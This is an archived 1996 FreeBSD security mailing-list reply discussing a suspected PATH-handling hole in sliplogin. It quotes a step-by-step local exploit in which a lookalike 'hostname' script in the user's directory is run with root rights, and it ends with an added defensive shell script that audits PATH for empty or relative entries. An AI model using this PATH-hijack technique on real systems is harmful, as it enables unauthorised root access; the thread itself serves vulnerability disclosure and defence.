From owner-freebsd-security Mon Feb 12 08:52:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id IAA10376 for security-outgoing; Mon, 12 Feb 1996 08:52:21 -0800 (PST)
Received: from rocky.sri.MT.net (rocky.sri.MT.net [204.182.243.10]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id IAA10370 for ; Mon, 12 Feb 1996 08:52:16 -0800 (PST)
Received: (from nate@localhost) by rocky.sri.MT.net (8.6.12/8.6.12) id JAA19323; Mon, 12 Feb 1996 09:54:44 -0700
Date: Mon, 12 Feb 1996 09:54:44 -0700
From: Nate Williams
Message-Id: <199602121654.JAA19323@rocky.sri.MT.net>
To: Michael Constant
Cc: mconst@csua.berkeley.edu, nate@sri.MT.net, freebsd-security@freebsd.org
Subject: Re: sliplogin hole?
In-Reply-To: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
References: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
Sender: owner-security@freebsd.org
Precedence: bulk

> Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which
> is just as insecure as not changing the path at all :-)  But thanks for
> pointing out my misconception.

Hmmm.....  Maybe I am confused, although I see that piece of code used in
the 'sh' sources.

> The exploit as I stated it does work; it's written out in full below,
> in case I didn't explain it clearly in my original letter.

...

>
> jrl@host% cd ~/bin
> jrl@host% cat > hostname
> #! /bin/sh
> touch /etc/i-am-root
> /bin/hostname
> ^D
> jrl@host% chmod 755 hostname
> jrl@host% sliplogin Sjrl
> starting slip login for Sjrl
>
> ... and by this point, the deed is done.

I just tried this, and it didn't work on my box although I was allowed to
run sliplogin.  It dies with:

sliplogin[953]: ioctl (TIOCSCTTY): Operation not permitte

Which might not occur on a dial-in line.  Unfortunately, I'm unable to
test this out right now, but I will try it out from home.

Nate
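An added example, not part of the thread above, illustrating the point Michael makes about "PATH=:/bin:/usr/bin": in the Bourne shell an empty PATH element is searched as the current directory, so the leading ':' is equivalent to '.'. The script audits a PATH string for empty or relative entries (generalizing slightly beyond the empty-element case) and shows how a command name resolves under such a PATH; the function names and the constructed sample PATH strings are mine, not anything from sliplogin or sh.

```shell
#!/bin/sh
# Added example (not from the thread): a defender's check for the PATH issue
# quoted above. In the Bourne shell an empty PATH element (leading/trailing ':'
# or '::') is searched as the current directory, so "PATH=:/bin:/usr/bin" is no
# safer than leaving '.' in PATH; a privileged program that execs "hostname"
# with such a PATH can be handed a lookalike from the caller's cwd.

# Print every PATH element that is not an absolute directory; return 1 if any
# were found, 0 if the PATH is absolute-only. Splitting is done by parameter
# expansion because IFS splitting would silently drop the empty elements.
insecure_path_entries() {
    rest="$1:"
    found=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            "")  echo "empty entry (current directory)"; found=1 ;;
            /*)  ;;
            *)   echo "relative entry: $entry"; found=1 ;;
        esac
    done
    return $found
}

# Resolve a command name the way the shell does for a given PATH string and
# print the first executable found; an empty element resolves to "$name" in
# the current directory, which is what makes the quoted trick work.
first_match() {
    name="$1"
    rest="$2:"
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        if [ -z "$entry" ]; then cand="$name"; else cand="$entry/$name"; fi
        if [ -f "$cand" ] && [ -x "$cand" ]; then
            echo "$cand"
            return 0
        fi
    done
    return 1
}

# Stand-alone use: audit the caller's PATH (or a PATH string given as $1).
insecure_path_entries "${1:-$PATH}"
```

The fix a privileged program wants is an absolute-only PATH such as "/bin:/usr/bin", for which the audit prints nothing and returns 0.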